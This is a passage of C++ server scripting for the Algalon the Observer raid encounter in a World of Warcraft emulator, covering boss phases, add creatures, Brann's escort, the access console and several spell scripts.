                        // Self-damage aura; its death spawns a Black Hole.
                        summon->CastSpell(summon, SPELL_COLLAPSE, TRIGGERED_FULL_MASK);
                        break;
                    case NPC_BLACK_HOLE:
                        summon->SetReactState(REACT_PASSIVE);
                        summon->CastSpell(nullptr, SPELL_BLACK_HOLE_TRIGGER, TRIGGERED_FULL_MASK);
                        summon->CastSpell(summon, SPELL_CONSTELLATION_PHASE_TRIGGER, TRIGGERED_FULL_MASK);
                        summon->CastSpell(nullptr, SPELL_BLACK_HOLE_EXPLOSION);
                        summon->CastSpell(summon, SPELL_SUMMON_VOID_ZONE_VISUAL, TRIGGERED_FULL_MASK);
                        break;
                    case NPC_ALGALON_VOID_ZONE_VISUAL_STALKER:
                        summon->CastSpell(summon, SPELL_VOID_ZONE_VISUAL, TRIGGERED_FULL_MASK);
                        break;
                    case NPC_ALGALON_STALKER_ASTEROID_TARGET_01:
                        summon->CastSpell(summon, SPELL_COSMIC_SMASH_VISUAL_STATE, TRIGGERED_FULL_MASK);
                        break;
                    case NPC_ALGALON_STALKER_ASTEROID_TARGET_02:
                        // Delayed impact damage 3.25s after the asteroid appears.
                        summon->m_Events.AddEvent(new CosmicSmashDamageEvent(summon), summon->m_Events.CalculateTime(3250));
                        break;
                    case NPC_WORM_HOLE:
                        summon->SetReactState(REACT_PASSIVE);
                        summon->CastSpell(summon, SPELL_WORM_HOLE_TRIGGER, TRIGGERED_FULL_MASK);
                        summon->CastSpell(summon, SPELL_SUMMON_VOID_ZONE_VISUAL, TRIGGERED_FULL_MASK);
                        break;
                    case NPC_UNLEASHED_DARK_MATTER:
                        // Send the add at a random non-tank player.
                        if (Unit* target = SelectTarget(SELECT_TARGET_RANDOM, 0, NonTankTargetSelector(me)))
                            if (summon->Attack(target, true))
                                summon->GetMotionMaster()->MoveChase(target);
                        break;
                }
            }

            void EnterEvadeMode(EvadeReason why) override
            {
                instance->SetBossState(BOSS_ALGALON, FAIL);
                BossAI::EnterEvadeMode(why);
                me->SetImmuneToPC(false);
                me->SetSheath(SHEATH_STATE_UNARMED);
            }

            void DamageTaken(Unit* /*attacker*/, uint32& damage) override
            {
                // After the "defeat" at 2.5% Algalon can no longer take damage.
                if (_fightWon)
                {
                    damage = 0;
                    return;
                }

                // Phase two at 20%: stars/constellations out, worm holes in.
                if (!_phaseTwo && me->HealthBelowPctDamaged(20, damage))
                {
                    _phaseTwo = true;
                    Talk(SAY_ALGALON_PHASE_TWO);
                    summons.DespawnEntry(NPC_LIVING_CONSTELLATION);
                    summons.DespawnEntry(NPC_COLLAPSING_STAR);
                    summons.DespawnEntry(NPC_BLACK_HOLE);
                    summons.DespawnEntry(NPC_ALGALON_VOID_ZONE_VISUAL_STALKER);
                    events.CancelEvent(EVENT_SUMMON_COLLAPSING_STAR);

                    std::list<Creature*> stalkers;
                    me->GetCreatureListWithEntryInGrid(stalkers, NPC_ALGALON_STALKER, 200.0f);
                    for (std::list<Creature*>::iterator itr = stalkers.begin(); itr != stalkers.end(); ++itr)
                        (*itr)->m_Events.KillAllEvents(true);

                    for (uint32 i = 0; i < COLLAPSING_STAR_COUNT; ++i)
                        if (Creature* wormHole = DoSummon(NPC_WORM_HOLE, CollapsingStarPos[i], TEMPSUMMON_MANUAL_DESPAWN))
                            wormHole->m_Events.AddEvent(new SummonUnleashedDarkMatter(wormHole), wormHole->m_Events.CalculateTime(i >= 2 ? 8000 : 6000));
                }
                // Algalon is never killed: below 2.5% he concedes and the
                // outro starts instead.
                else if ((int32(me->GetHealth()) - int32(damage)) < CalculatePct<int32>(int32(me->GetMaxHealth()), 2.5f) && !_fightWon)
                {
                    _fightWon = true;
                    damage = 0;
                    me->SetReactState(REACT_PASSIVE);
                    me->AttackStop();
                    me->SetFaction(FACTION_FRIENDLY);
                    me->SetFlag(UNIT_FIELD_FLAGS, UNIT_FLAG_NOT_SELECTABLE);
                    DoCast(me, SPELL_SELF_STUN);
                    events.Reset();
                    summons.DespawnAll();
                    events.SetPhase(PHASE_ROLE_PLAY);
                    events.ScheduleEvent(EVENT_OUTRO_START, 1500);
                    events.ScheduleEvent(EVENT_OUTRO_1, 7200);
                    events.ScheduleEvent(EVENT_OUTRO_2, 8700);
                }
            }

            void UpdateAI(uint32 diff) override
            {
                // Role-play and Big Bang phases must keep ticking even with no
                // valid victim (intro/outro scenes, everyone phased out).
                if (!(events.IsInPhase(PHASE_ROLE_PLAY) || events.IsInPhase(PHASE_BIG_BANG)) && !UpdateVictim())
                    return;

                events.Update(diff);

                if (!events.IsInPhase(PHASE_ROLE_PLAY))
                    if (me->HasUnitState(UNIT_STATE_CASTING))
                        return;

                while (uint32 eventId = events.ExecuteEvent())
                {
                    switch (eventId)
                    {
                        case EVENT_INTRO_1:
                            me->RemoveAurasDueToSpell(SPELL_RIDE_THE_LIGHTNING);
                            Talk(SAY_ALGALON_INTRO_1);
                            break;
                        case EVENT_INTRO_2:
                            DoCastAOE(SPELL_SUMMON_AZEROTH, true);
                            Talk(SAY_ALGALON_INTRO_2);
                            break;
                        case EVENT_INTRO_3:
                            Talk(SAY_ALGALON_INTRO_3);
                            break;
                        case EVENT_INTRO_FINISH:
                            events.Reset();
                            me->SetImmuneToPC(false);
                            break;
                        case EVENT_START_COMBAT:
                            instance->SetBossState(BOSS_ALGALON, IN_PROGRESS);
                            break;
                        case EVENT_INTRO_TIMER_DONE:
                        {
                            // End of the pre-combat role play: make Algalon
                            // attackable and bring in the constellations.
                            events.SetPhase(PHASE_NORMAL);
                            me->SetSheath(SHEATH_STATE_MELEE);
                            me->RemoveFlag(UNIT_FIELD_FLAGS, UNIT_FLAG_NOT_SELECTABLE);
                            me->SetImmuneToNPC(false);
                            me->SetReactState(REACT_DEFENSIVE);
                            DoCastAOE(SPELL_SUPERMASSIVE_FAIL, true);
                            //! Workaround for Creature::_IsTargetAcceptable returning false
                            //! for creatures that start combat in REACT_PASSIVE and UNIT_FLAG_NOT_SELECTABLE
                            //! causing them to immediately evade
                            if (!me->GetThreatManager().IsThreatListEmpty())
                                AttackStart(me->GetThreatManager().SelectVictim());
                            for (uint32 i = 0; i < LIVING_CONSTELLATION_COUNT; ++i)
                                if (Creature* summon = DoSummon(NPC_LIVING_CONSTELLATION, ConstellationPos[i], 0, TEMPSUMMON_DEAD_DESPAWN))
                                    summon->SetReactState(REACT_PASSIVE);
                            // One random stalker drives constellation activation.
                            std::list<Creature*> stalkers;
                            me->GetCreatureListWithEntryInGrid(stalkers, NPC_ALGALON_STALKER, 200.0f);
                            if (!stalkers.empty())
                            {
                                Unit* stalker = Trinity::Containers::SelectRandomContainerElement(stalkers);
                                stalker->m_Events.AddEvent(new ActivateLivingConstellation(stalker), stalker->m_Events.CalculateTime(urand(45000, 50000)));
                            }
                            break;
                        }
                        case EVENT_QUANTUM_STRIKE:
                            DoCastVictim(SPELL_QUANTUM_STRIKE);
                            events.ScheduleEvent(EVENT_QUANTUM_STRIKE, urand(3000, 5000));
                            break;
                        case EVENT_PHASE_PUNCH:
                            DoCastVictim(SPELL_PHASE_PUNCH);
                            events.ScheduleEvent(EVENT_PHASE_PUNCH, 15500);
                            break;
                        case EVENT_SUMMON_COLLAPSING_STAR:
                            Talk(SAY_ALGALON_COLLAPSING_STAR);
                            Talk(EMOTE_ALGALON_COLLAPSING_STAR);
                            for (uint32 i = 0; i < COLLAPSING_STAR_COUNT; ++i)
                                me->SummonCreature(NPC_COLLAPSING_STAR, CollapsingStarPos[i], TEMPSUMMON_CORPSE_DESPAWN);
                            events.ScheduleEvent(EVENT_SUMMON_COLLAPSING_STAR, 60000);
                            break;
                        case EVENT_BIG_BANG:
                        {
                            Talk(SAY_ALGALON_BIG_BANG);
                            Talk(EMOTE_ALGALON_BIG_BANG);
                            // Pause normal updates for the 9.5s cast; the spell
                            // script may instead request ACTION_ASCEND.
                            events.SetPhase(PHASE_BIG_BANG);
                            std::list<Creature*> constellations;
                            me->GetCreatureListWithEntryInGrid(constellations, NPC_LIVING_CONSTELLATION, 200.0f);
                            for (std::list<Creature*>::iterator itr = constellations.begin(); itr != constellations.end(); ++itr)
                                (*itr)->AI()->DoAction(ACTION_BIG_BANG);
                            DoCastAOE(SPELL_BIG_BANG);
                            events.ScheduleEvent(EVENT_BIG_BANG, 90500);
                            events.ScheduleEvent(EVENT_RESUME_UPDATING, 9500);
                            break;
                        }
                        case EVENT_RESUME_UPDATING:
                            events.SetPhase(0);
                            break;
                        case EVENT_ASCEND_TO_THE_HEAVENS:
                            // Berserk: wipes the raid, then evade.
                            Talk(SAY_ALGALON_ASCEND);
                            DoCastAOE(SPELL_ASCEND_TO_THE_HEAVENS);
                            events.ScheduleEvent(EVENT_EVADE, 2500);
                            break;
                        case EVENT_EVADE:
                            EnterEvadeMode(EVADE_REASON_OTHER);
                            break;
                        case EVENT_COSMIC_SMASH:
                            Talk(EMOTE_ALGALON_COSMIC_SMASH);
                            DoCastAOE(SPELL_COSMIC_SMASH);
                            events.ScheduleEvent(EVENT_COSMIC_SMASH, 25500);
                            break;
                        case EVENT_UNLOCK_YELL:
                            _hasYelled = false;
                            break;
                        case EVENT_OUTRO_START:
                            instance->SetBossState(BOSS_ALGALON, DONE);
                            break;
                        case EVENT_OUTRO_1:
                            me->RemoveAllAuras();
                            me->SetFlag(UNIT_FIELD_FLAGS, UNIT_FLAG_RENAME);
                            break;
                        case EVENT_OUTRO_2:
                            _EnterEvadeMode();
                            me->GetMotionMaster()->MovePoint(POINT_ALGALON_OUTRO, AlgalonOutroPos);
                            break;
                        case EVENT_OUTRO_3:
                            DoCastAOE(SPELL_KILL_CREDIT);
                            break;
                        case EVENT_OUTRO_4:
                            DoCastAOE(SPELL_SUPERMASSIVE_FAIL);
                            me->RemoveFlag(UNIT_FIELD_FLAGS, UNIT_FLAG_NOT_SELECTABLE);
                            break;
                        case EVENT_OUTRO_5:
                            if (Creature* brann = DoSummon(NPC_BRANN_BRONZBEARD_ALG, BrannOutroPos[0], 131500, TEMPSUMMON_TIMED_DESPAWN))
                                brann->AI()->DoAction(ACTION_OUTRO);
                            break;
                        case EVENT_OUTRO_6:
                            Talk(SAY_ALGALON_OUTRO_1);
                            me->SetStandState(UNIT_STAND_STATE_KNEEL);
                            break;
                        case EVENT_OUTRO_7:
                            Talk(SAY_ALGALON_OUTRO_2);
                            break;
                        case EVENT_OUTRO_8:
                            Talk(SAY_ALGALON_OUTRO_3);
                            break;
                        case EVENT_OUTRO_9:
                            Talk(SAY_ALGALON_OUTRO_4);
                            break;
                        case EVENT_OUTRO_10:
                            Talk(SAY_ALGALON_OUTRO_5);
                            break;
                        case EVENT_OUTRO_11:
                            me->SetStandState(UNIT_STAND_STATE_STAND);
                            DoCast(me, SPELL_TELEPORT);
                            me->DespawnOrUnsummon(1500);
                            break;
                    }

                    // A cast started by an event blocks further events this tick
                    // (except during role play).
                    if (me->HasUnitState(UNIT_STATE_CASTING) && !events.IsInPhase(PHASE_ROLE_PLAY))
                        return;
                }

                DoMeleeAttackIfReady();
            }

        private:
            bool _firstPull;    // false once the intro/start-timer sequence has run
            bool _fedOnTears;   // a player died to Algalon (achievement data)
            bool _phaseTwo;     // below 20% HP, worm-hole phase
            bool _fightWon;     // below 2.5% HP, outro running
            bool _hasYelled;    // kill-yell throttle
        };

        CreatureAI* GetAI(Creature* creature) const override
        {
            return GetUlduarAI<boss_algalon_the_observerAI>(creature);
        }
};
// Living Constellation add. Spawned passive; activated in waves of three
// via SPELL_TRIGGER_3_ADDS (ACTION_ACTIVATE_STAR). Despawns itself and the
// Black Hole that "absorbs" it when hit by SPELL_CONSTELLATION_PHASE_EFFECT,
// which also starts the Supermassive timed achievement.
class npc_living_constellation : public CreatureScript
{
    public:
        npc_living_constellation() : CreatureScript("npc_living_constellation") { }

        struct npc_living_constellationAI : public CreatureAI
        {
            npc_living_constellationAI(Creature* creature) : CreatureAI(creature)
            {
                Initialize();
            }

            void Initialize()
            {
                _isActive = false;
            }

            void Reset() override
            {
                _events.Reset();
                _events.ScheduleEvent(EVENT_ARCANE_BARRAGE, 2500);
                Initialize();
            }

            uint32 GetData(uint32 /*type*/) const override
            {
                // Queried by ActiveConstellationFilter: non-zero = already active.
                return _isActive ? 1 : 0;
            }

            void DoAction(int32 action) override
            {
                switch (action)
                {
                    case ACTION_ACTIVATE_STAR:
                        if (Creature* algalon = me->FindNearestCreature(NPC_ALGALON, 200.0f))
                        {
                            // Open on a random non-tank target from Algalon's list.
                            if (Unit* target = algalon->AI()->SelectTarget(SELECT_TARGET_RANDOM, 0, NonTankTargetSelector(algalon)))
                            {
                                me->SetReactState(REACT_AGGRESSIVE);
                                me->RemoveFlag(UNIT_FIELD_FLAGS, UNIT_FLAG_NOT_SELECTABLE);
                                AttackStart(target);
                                DoZoneInCombat();
                                _isActive = true;
                            }
                        }
                        break;
                    case ACTION_BIG_BANG:
                        // Freeze for the duration of Algalon's Big Bang cast.
                        _events.SetPhase(PHASE_BIG_BANG);
                        _events.DelayEvents(9500);
                        _events.ScheduleEvent(EVENT_RESUME_UPDATING, 9500);
                        break;
                }
            }

            void SpellHit(Unit* caster, SpellInfo const* spell) override
            {
                // Only react to the Black Hole's phase effect.
                if (spell->Id != SPELL_CONSTELLATION_PHASE_EFFECT || caster->GetTypeId() != TYPEID_UNIT)
                    return;

                me->DespawnOrUnsummon(1);
                if (InstanceScript* instance = me->GetInstanceScript())
                    instance->DoStartTimedAchievement(ACHIEVEMENT_TIMED_TYPE_EVENT, EVENT_ID_SUPERMASSIVE_START);
                // The Black Hole grants credit and is consumed as well.
                caster->CastSpell(nullptr, SPELL_BLACK_HOLE_CREDIT, TRIGGERED_FULL_MASK);
                caster->ToCreature()->DespawnOrUnsummon(1);
            }

            void UpdateAI(uint32 diff) override
            {
                if (!(_events.IsInPhase(PHASE_ROLE_PLAY) || _events.IsInPhase(PHASE_BIG_BANG)) && !UpdateVictim())
                    return;

                _events.Update(diff);

                while (uint32 eventId = _events.ExecuteEvent())
                {
                    switch (eventId)
                    {
                        case EVENT_ARCANE_BARRAGE:
                            DoCastAOE(SPELL_ARCANE_BARRAGE);
                            _events.ScheduleEvent(EVENT_ARCANE_BARRAGE, 2500);
                            break;
                        case EVENT_RESUME_UPDATING:
                            _events.SetPhase(0);
                            break;
                    }
                }
            }

        private:
            EventMap _events;
            bool _isActive;
        };

        CreatureAI* GetAI(Creature* creature) const override
        {
            return GetUlduarAI<npc_living_constellationAI>(creature);
        }
};
// Collapsing Star. Loses 1% max health per second from SPELL_COLLAPSE
// (applied by Algalon's JustSummoned); when players finish it off it does
// not die but turns into a Black Hole, which is handed back to Algalon's
// summon list so phase logic can track it.
class npc_collapsing_star : public CreatureScript
{
    public:
        npc_collapsing_star() : CreatureScript("npc_collapsing_star") { }

        struct npc_collapsing_starAI : public PassiveAI
        {
            npc_collapsing_starAI(Creature* creature) : PassiveAI(creature)
            {
                _dying = false;
            }

            void JustSummoned(Creature* summon) override
            {
                if (summon->GetEntry() != NPC_BLACK_HOLE)
                    return;

                // Re-parent the Black Hole to Algalon (our summoner) so his
                // SummonList and JustSummoned handling apply to it.
                if (TempSummon* summ = me->ToTempSummon())
                    if (Creature* algalon = ObjectAccessor::GetCreature(*me, summ->GetSummonerGUID()))
                        algalon->AI()->JustSummoned(summon);

                me->DespawnOrUnsummon(1);
            }

            void DamageTaken(Unit* /*attacker*/, uint32& damage) override
            {
                if (_dying)
                {
                    damage = 0;
                    return;
                }

                // Intercept the killing blow: spawn the Black Hole instead of dying.
                if (damage >= me->GetHealth())
                {
                    _dying = true;
                    damage = 0;
                    DoCast(me, SPELL_BLACK_HOLE_SPAWN_VISUAL, true);
                    DoCast(me, SPELL_SUMMON_BLACK_HOLE, true);
                }
            }

            // Set once the star has "died"; further damage is ignored.
            bool _dying;
        };

        CreatureAI* GetAI(Creature* creature) const override
        {
            return GetUlduarAI<npc_collapsing_starAI>(creature);
        }
};
// Brann Bronzebeard escort for the Algalon intro and outro scenes. Walks a
// fixed waypoint list into the planetarium, summons Algalon, retraces his
// path out, and returns after the fight for the outro lines.
class npc_brann_bronzebeard_algalon : public CreatureScript
{
    public:
        npc_brann_bronzebeard_algalon() : CreatureScript("npc_brann_bronzebeard_algalon") { }

        struct npc_brann_bronzebeard_algalonAI : public CreatureAI
        {
            npc_brann_bronzebeard_algalonAI(Creature* creature) : CreatureAI(creature)
            {
                _currentPoint = 0;
            }

            void DoAction(int32 action) override
            {
                switch (action)
                {
                    // Console used: run in and start the intro.
                    case ACTION_START_INTRO:
                        _currentPoint = 0;
                        _events.Reset();
                        me->SetWalk(false);
                        _events.ScheduleEvent(EVENT_BRANN_MOVE_INTRO, 1);
                        break;
                    // Algalon pulled for the first time: say goodbye and leave
                    // (resumes the waypoint list from where the intro stopped).
                    case ACTION_FINISH_INTRO:
                        Talk(SAY_BRANN_ALGALON_INTRO_2);
                        _events.ScheduleEvent(EVENT_BRANN_MOVE_INTRO, 1);
                        break;
                    // Summoned again after the fight for the outro.
                    case ACTION_OUTRO:
                        me->GetMotionMaster()->MovePoint(POINT_BRANN_OUTRO, BrannOutroPos[1]);
                        _events.ScheduleEvent(EVENT_BRANN_OUTRO_1, 89500);
                        _events.ScheduleEvent(EVENT_BRANN_OUTRO_2, 116500);
                        break;
                }
            }

            void MovementInform(uint32 movementType, uint32 pointId) override
            {
                if (movementType != POINT_MOTION_TYPE)
                    return;

                uint32 delay = 1;
                _currentPoint = pointId + 1;
                switch (pointId)
                {
                    case 2:
                        // Pause at the doorway, then walk the rest of the way in.
                        delay = 8000;
                        me->SetWalk(true);
                        break;
                    case 5:
                        // Innermost point: deliver the intro and summon Algalon;
                        // movement resumes only via ACTION_FINISH_INTRO.
                        me->SetWalk(false);
                        Talk(SAY_BRANN_ALGALON_INTRO_1);
                        _events.ScheduleEvent(EVENT_SUMMON_ALGALON, 7500);
                        return;
                    case 9:
                        // Back at the entrance: leave.
                        me->DespawnOrUnsummon(1);
                        return;
                    case POINT_BRANN_OUTRO:
                    case POINT_BRANN_OUTRO_END:
                        return;
                }
                _events.ScheduleEvent(EVENT_BRANN_MOVE_INTRO, delay);
            }

            void UpdateAI(uint32 diff) override
            {
                UpdateVictim();
                if (_events.Empty())
                    return;

                _events.Update(diff);

                while (uint32 eventId = _events.ExecuteEvent())
                {
                    switch (eventId)
                    {
                        case EVENT_BRANN_MOVE_INTRO:
                            if (_currentPoint < MAX_BRANN_WAYPOINTS_INTRO)
                                me->GetMotionMaster()->MovePoint(_currentPoint, BrannIntroWaypoint[_currentPoint]);
                            break;
                        case EVENT_SUMMON_ALGALON:
                            if (Creature* algalon = me->GetMap()->SummonCreature(NPC_ALGALON, AlgalonSummonPos))
                                algalon->AI()->DoAction(ACTION_START_INTRO);
                            break;
                        case EVENT_BRANN_OUTRO_1:
                            Talk(SAY_BRANN_ALGALON_OUTRO);
                            break;
                        case EVENT_BRANN_OUTRO_2:
                            me->GetMotionMaster()->MovePoint(POINT_BRANN_OUTRO_END, BrannOutroPos[2]);
                            break;
                    }
                }
            }

        private:
            EventMap _events;
            uint32 _currentPoint;   // next index into BrannIntroWaypoint
        };

        CreatureAI* GetAI(Creature* creature) const override
        {
            return GetUlduarAI<npc_brann_bronzebeard_algalonAI>(creature);
        }
};
// The Celestial Planetarium Access console. On use, verifies the player
// carries a key item matching the object's lock, then starts the Algalon
// event (summons Brann, opens the sigil doors) and despawns itself.
class go_celestial_planetarium_access : public GameObjectScript
{
    public:
        go_celestial_planetarium_access() : GameObjectScript("go_celestial_planetarium_access") { }

        struct go_celestial_planetarium_accessAI : public GameObjectAI
        {
            go_celestial_planetarium_accessAI(GameObject* go) : GameObjectAI(go), instance(go->GetInstanceScript()) { }

            InstanceScript* instance;

            bool GossipHello(Player* player) override
            {
                // Already used: swallow the interaction.
                if (me->HasFlag(GAMEOBJECT_FLAGS, GO_FLAG_IN_USE))
                    return true;

                // Check the lock's key items against the player's inventory.
                bool hasKey = true;
                if (LockEntry const* lock = sLockStore.LookupEntry(me->GetGOInfo()->goober.lockId))
                {
                    hasKey = false;
                    for (uint32 i = 0; i < MAX_LOCK_CASE; ++i)
                    {
                        if (!lock->Index[i])
                            continue;

                        if (player->HasItemCount(lock->Index[i]))
                        {
                            hasKey = true;
                            break;
                        }
                    }
                }

                if (!hasKey)
                    return false;

                // Start Algalon event
                me->SetFlag(GAMEOBJECT_FLAGS, GO_FLAG_IN_USE);
                _events.ScheduleEvent(EVENT_DESPAWN_CONSOLE, 5000);
                if (Creature* brann = me->SummonCreature(NPC_BRANN_BRONZBEARD_ALG, BrannIntroSpawnPos))
                    brann->AI()->DoAction(ACTION_START_INTRO);

                instance->SetData(DATA_ALGALON_SUMMON_STATE, 1);
                if (GameObject* sigil = ObjectAccessor::GetGameObject(*me, instance->GetGuidData(DATA_SIGILDOOR_01)))
                    sigil->SetGoState(GO_STATE_ACTIVE);

                if (GameObject* sigil = ObjectAccessor::GetGameObject(*me, instance->GetGuidData(DATA_SIGILDOOR_02)))
                    sigil->SetGoState(GO_STATE_ACTIVE);
                return false;
            }

            void UpdateAI(uint32 diff) override
            {
                if (_events.Empty())
                    return;

                _events.Update(diff);

                while (uint32 eventId = _events.ExecuteEvent())
                {
                    switch (eventId)
                    {
                        case EVENT_DESPAWN_CONSOLE:
                            me->Delete();
                            break;
                    }
                }
            }

            EventMap _events;
        };

        GameObjectAI* GetAI(GameObject* go) const override
        {
            return GetUlduarAI<go_celestial_planetarium_accessAI>(go);
        }
};
// 64412 - Phase Punch. Each periodic tick swaps the target's alpha-overlay
// aura for the one matching the current stack count (PhasePunchAlphaId);
// at 5 stacks the aura removes itself, which phases the target out.
class spell_algalon_phase_punch : public SpellScriptLoader
{
    public:
        spell_algalon_phase_punch() : SpellScriptLoader("spell_algalon_phase_punch") { }

        class spell_algalon_phase_punch_AuraScript : public AuraScript
        {
            PrepareAuraScript(spell_algalon_phase_punch_AuraScript);

            void HandlePeriodic(AuraEffect const* /*aurEff*/)
            {
                PreventDefaultAction();
                // Drop the overlay of the previous stack level before applying
                // the one for the current level.
                if (GetStackAmount() != 1)
                    GetTarget()->RemoveAurasDueToSpell(PhasePunchAlphaId[GetStackAmount() - 2]);
                GetTarget()->CastSpell(GetTarget(), PhasePunchAlphaId[GetStackAmount() - 1], TRIGGERED_FULL_MASK);
                if (GetStackAmount() == 5)
                    Remove(AURA_REMOVE_BY_DEFAULT);
            }

            void OnRemove(AuraEffect const*, AuraEffectHandleModes)
            {
                // Early removal (not at 5 stacks): clean up the current overlay.
                if (GetStackAmount() != 5)
                    GetTarget()->RemoveAurasDueToSpell(PhasePunchAlphaId[GetStackAmount() - 1]);
            }

            void Register() override
            {
                OnEffectPeriodic += AuraEffectPeriodicFn(spell_algalon_phase_punch_AuraScript::HandlePeriodic, EFFECT_0, SPELL_AURA_PERIODIC_DUMMY);
                OnEffectRemove += AuraEffectRemoveFn(spell_algalon_phase_punch_AuraScript::OnRemove, EFFECT_0, SPELL_AURA_PERIODIC_DUMMY, AURA_EFFECT_HANDLE_REAL);
            }
        };

        AuraScript* GetAuraScript() const override
        {
            return new spell_algalon_phase_punch_AuraScript();
        }
};
class NotVictimFilter
{
public:
NotVictimFilter(Unit* caster) : _victim(caster->GetVictim())
{
}
bool operator()(WorldObject* target)
{
return target != _victim;
}
private:
Unit* _victim;
};
// 64599 - Arcane Barrage (Living Constellation). Restricts the area target
// selection to the caster's current victim only.
class spell_algalon_arcane_barrage : public SpellScriptLoader
{
    public:
        spell_algalon_arcane_barrage() : SpellScriptLoader("spell_algalon_arcane_barrage") { }

        class spell_algalon_arcane_barrage_SpellScript : public SpellScript
        {
            PrepareSpellScript(spell_algalon_arcane_barrage_SpellScript);

            void SelectTarget(std::list<WorldObject*>& targets)
            {
                targets.remove_if(NotVictimFilter(GetCaster()));
            }

            void Register() override
            {
                OnObjectAreaTargetSelect += SpellObjectAreaTargetSelectFn(spell_algalon_arcane_barrage_SpellScript::SelectTarget, EFFECT_0, TARGET_UNIT_SRC_AREA_ENEMY);
            }
        };

        SpellScript* GetSpellScript() const override
        {
            return new spell_algalon_arcane_barrage_SpellScript();
        }
};
class ActiveConstellationFilter
{
public:
bool operator()(WorldObject* target) const
{
return target->ToUnit() && target->ToUnit()->GetAI() && target->ToUnit()->GetAI()->GetData(0);
}
};
// 62266 - Trigger 3 Adds (Algalon Stalker). Picks inactive Living
// Constellations and orders each hit one to activate via its AI.
class spell_algalon_trigger_3_adds : public SpellScriptLoader
{
    public:
        spell_algalon_trigger_3_adds() : SpellScriptLoader("spell_algalon_trigger_3_adds") { }

        class spell_algalon_trigger_3_adds_SpellScript : public SpellScript
        {
            PrepareSpellScript(spell_algalon_trigger_3_adds_SpellScript);

            void SelectTarget(std::list<WorldObject*>& targets)
            {
                // Only constellations that have not been activated yet.
                targets.remove_if(ActiveConstellationFilter());
            }

            void HandleDummy(SpellEffIndex effIndex)
            {
                PreventHitDefaultEffect(effIndex);
                Creature* target = GetHitCreature();
                if (!target)
                    return;

                target->AI()->DoAction(ACTION_ACTIVATE_STAR);
            }

            void Register() override
            {
                OnObjectAreaTargetSelect += SpellObjectAreaTargetSelectFn(spell_algalon_trigger_3_adds_SpellScript::SelectTarget, EFFECT_0, TARGET_UNIT_SRC_AREA_ENTRY);
                OnEffectHitTarget += SpellEffectFn(spell_algalon_trigger_3_adds_SpellScript::HandleDummy, EFFECT_0, SPELL_EFFECT_DUMMY);
            }
        };

        SpellScript* GetSpellScript() const override
        {
            return new spell_algalon_trigger_3_adds_SpellScript();
        }
};
// 62018 - Collapse (Collapsing Star). Each tick burns 1% of the star's
// max health as direct (NODAMAGE-school) self-damage, so players only need
// to finish it off.
class spell_algalon_collapse : public SpellScriptLoader
{
    public:
        spell_algalon_collapse() : SpellScriptLoader("spell_algalon_collapse") { }

        class spell_algalon_collapse_AuraScript : public AuraScript
        {
            PrepareAuraScript(spell_algalon_collapse_AuraScript);

            void HandlePeriodic(AuraEffect const* /*aurEff*/)
            {
                PreventDefaultAction();
                GetTarget()->DealDamage(GetTarget(), GetTarget()->CountPctFromMaxHealth(1), nullptr, NODAMAGE);
            }

            void Register() override
            {
                OnEffectPeriodic += AuraEffectPeriodicFn(spell_algalon_collapse_AuraScript::HandlePeriodic, EFFECT_0, SPELL_AURA_PERIODIC_DUMMY);
            }
        };

        AuraScript* GetAuraScript() const override
        {
            return new spell_algalon_collapse_AuraScript();
        }
};
// 64443 - Big Bang. Counts how many enemies the cast actually hit; if the
// whole raid was phased out (zero targets), tells Algalon's AI to Ascend
// (raid wipe) instead of continuing.
class spell_algalon_big_bang : public SpellScriptLoader
{
    public:
        spell_algalon_big_bang() : SpellScriptLoader("spell_algalon_big_bang") { }

        class spell_algalon_big_bang_SpellScript : public SpellScript
        {
            PrepareSpellScript(spell_algalon_big_bang_SpellScript);

        public:
            spell_algalon_big_bang_SpellScript()
            {
                _targetCount = 0;
            }

        private:
            bool Load() override
            {
                // Only meaningful when cast by an AI-enabled creature (Algalon).
                return GetCaster()->GetTypeId() == TYPEID_UNIT && GetCaster()->IsAIEnabled;
            }

            void CountTargets(std::list<WorldObject*>& targets)
            {
                _targetCount = targets.size();
            }

            void CheckTargets()
            {
                if (!_targetCount)
                    GetCaster()->GetAI()->DoAction(ACTION_ASCEND);
            }

            void Register() override
            {
                OnObjectAreaTargetSelect += SpellObjectAreaTargetSelectFn(spell_algalon_big_bang_SpellScript::CountTargets, EFFECT_0, TARGET_UNIT_SRC_AREA_ENEMY);
                AfterCast += SpellCastFn(spell_algalon_big_bang_SpellScript::CheckTargets);
            }

            // Number of enemies selected by the area targeting pass.
            uint32 _targetCount;
        };

        SpellScript* GetSpellScript() const override
        {
            return new spell_algalon_big_bang_SpellScript();
        }
};
// Periodic aura that strips all SPELL_AURA_PHASE auras from the target,
// pulling phased-out players back into Algalon's phase.
class spell_algalon_remove_phase : public SpellScriptLoader
{
    public:
        spell_algalon_remove_phase() : SpellScriptLoader("spell_algalon_remove_phase") { }

        class spell_algalon_remove_phase_AuraScript : public AuraScript
        {
            PrepareAuraScript(spell_algalon_remove_phase_AuraScript);

            void HandlePeriodic(AuraEffect const* /*aurEff*/)
            {
                PreventDefaultAction();
                GetTarget()->RemoveAurasByType(SPELL_AURA_PHASE);
            }

            void Register() override
            {
                OnEffectPeriodic += AuraEffectPeriodicFn(spell_algalon_remove_phase_AuraScript::HandlePeriodic, EFFECT_0, SPELL_AURA_PERIODIC_TRIGGER_SPELL);
            }
        };

        AuraScript* GetAuraScript() const override
        {
            return new spell_algalon_remove_phase_AuraScript();
        }
};
// 62295 - Cosmic Smash
// Raises the summon destination 65 yards so the asteroid spawns in the air
// above the chosen point and falls onto it.
class spell_algalon_cosmic_smash : public SpellScriptLoader
{
    public:
        spell_algalon_cosmic_smash() : SpellScriptLoader("spell_algalon_cosmic_smash") { }

        class spell_algalon_cosmic_smash_SpellScript : public SpellScript
        {
            PrepareSpellScript(spell_algalon_cosmic_smash_SpellScript);

            void ModDestHeight(SpellDestination& dest)
            {
                Position const offset = { 0.0f, 0.0f, 65.0f, 0.0f };
                dest.RelocateOffset(offset);
            }

            void Register() override
            {
                OnDestinationTargetSelect += SpellDestinationTargetSelectFn(spell_algalon_cosmic_smash_SpellScript::ModDestHeight, EFFECT_0, TARGET_DEST_CASTER_SUMMON);
            }
        };

        SpellScript* GetSpellScript() const override
        {
            return new spell_algalon_cosmic_smash_SpellScript();
        }
};
// Cosmic Smash damage: attenuates hit damage by the target's 2D distance from
// the explosion destination once the target is more than 6 yards away.
class spell_algalon_cosmic_smash_damage : public SpellScriptLoader
{
    public:
        spell_algalon_cosmic_smash_damage() : SpellScriptLoader("spell_algalon_cosmic_smash_damage") { }

